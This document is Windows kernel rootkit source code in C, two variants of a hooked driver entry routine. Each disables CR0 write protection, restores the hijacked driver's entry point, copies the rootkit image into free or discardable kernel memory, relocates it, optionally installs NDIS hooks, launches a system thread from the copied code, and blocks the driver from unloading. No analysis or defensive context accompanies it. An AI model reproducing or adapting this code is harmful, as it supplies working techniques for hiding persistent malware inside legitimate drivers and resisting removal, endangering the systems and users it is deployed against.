//-------------------------------------------------------------------------------------- NTSTATUS NewDriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) { // disable memory write protection ClearWp(); // restore original code from image entry point memcpy(m_HookedEntry, m_EpOriginalBytes, EP_PATCH_SIZE); // enable memory write protection SetWp(); NTSTATUS ns = m_HookedEntry(DriverObject, RegistryPath); DbgMsg(__FUNCTION__"(): Hooked driver returns 0x%.8x\n", ns); if (PsRemoveLoadImageNotifyRoutine(LoadImageNotify) == STATUS_SUCCESS) { m_bDriverMustBeFreed = TRUE; } if (NT_SUCCESS(ns)) { PVOID Image = ExAllocatePool(NonPagedPool, m_DriverSize); if (Image) { // prepare rootkit code for injection into the discardable sections memcpy(Image, m_DriverBase, m_DriverSize); RuntimeProcessRelocs(Image, (PVOID)((PUCHAR)m_FreeAreaFound - m_RkOffset)); // disable memory write protection ClearWp(); memcpy(m_FreeAreaFound, RVATOVA(Image, m_RkOffset), m_RkSize); // enable memory write protection SetWp(); PUCHAR PointerFixup = (PUCHAR)m_FreeAreaFound - m_RkOffset; // set up NDIS hooks DriverEntryInitializePayload(PointerFixup); PKSTART_ROUTINE Start = (PKSTART_ROUTINE)RECALCULATE_POINTER(DriverEntryContinueThread); DbgMsg(__FUNCTION__"(): Start address: "IFMT"\n", Start); // create thread for execution copied code HANDLE hThread = NULL; ns = PsCreateSystemThread( &hThread, THREAD_ALL_ACCESS, NULL, NULL, NULL, Start, m_bDriverMustBeFreed ? m_DriverBase : NULL ); if (NT_SUCCESS(ns)) { ZwClose(hThread); } else { DbgMsg("PsCreateSystemThread() fails: 0x%.8x\n", ns); } ExFreePool(Image); } // don't allow to unload target driver DriverObject->DriverUnload = NULL; } return ns; }
//-------------------------------------------------------------------------------------- NTSTATUS NewDriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) { // disable memory write protection ForEachProcessor(ClearWp, NULL); // restore original code from image entry point memcpy(m_HookedEntry, m_EpOriginalBytes, EP_PATCH_SIZE); // enable memory write protection ForEachProcessor(SetWp, NULL); NTSTATUS ns = m_HookedEntry(DriverObject, RegistryPath); DbgMsg(__FILE__, __LINE__, __FUNCTION__"(): Hooked driver returns 0x%.8x\n", ns); if (NT_SUCCESS(ns)) { PIMAGE_NT_HEADERS32 pHeaders = (PIMAGE_NT_HEADERS32) ((PUCHAR)m_Self->DllBase + ((PIMAGE_DOS_HEADER)m_Self->DllBase)->e_lfanew); PIMAGE_SECTION_HEADER pSection = (PIMAGE_SECTION_HEADER) (pHeaders->FileHeader.SizeOfOptionalHeader + (PUCHAR)&pHeaders->OptionalHeader); // disable memory write protection ForEachProcessor(ClearWp, NULL); // copy driver headers to the founded area RtlFillMemory(m_FreeAreaVA, m_FreeAreaLength, 0); RtlCopyMemory(m_FreeAreaVA, m_Self->DllBase, pHeaders->OptionalHeader.SizeOfHeaders); // copy sections for (ULONG i = 0; i < pHeaders->FileHeader.NumberOfSections; i++) { PVOID DataPtr = (PUCHAR)m_Self->DllBase + pSection->VirtualAddress; if (MmIsAddressValid(DataPtr)) { RtlCopyMemory( (PUCHAR)m_FreeAreaVA + pSection->VirtualAddress, DataPtr, min(pSection->SizeOfRawData, pSection->Misc.VirtualSize) ); } pSection += 1; } // reallocate copied image to the new address LdrProcessRelocs( m_FreeAreaVA, (PVOID)((PUCHAR)pHeaders->OptionalHeader.ImageBase - (PUCHAR)m_Self->DllBase + (PUCHAR)m_FreeAreaVA) ); // enable memory write protection ForEachProcessor(SetWp, NULL); PKSTART_ROUTINE Start = (PKSTART_ROUTINE)((PUCHAR)DriverEntryContinueThread - (PUCHAR)m_Self->DllBase + (PUCHAR)m_FreeAreaVA); // create thread for execution copied driver code HANDLE hThread = NULL; ns = PsCreateSystemThread( &hThread, THREAD_ALL_ACCESS, NULL, NULL, NULL, Start, NULL ); if (NT_SUCCESS(ns)) { ZwClose(hThread); } else { DbgMsg(__FILE__, __LINE__, "PsCreateSystemThread() fails; status: 0x%.8x\n", ns); } // don't allow to unload target driver DriverObject->DriverUnload = NULL; } return ns; }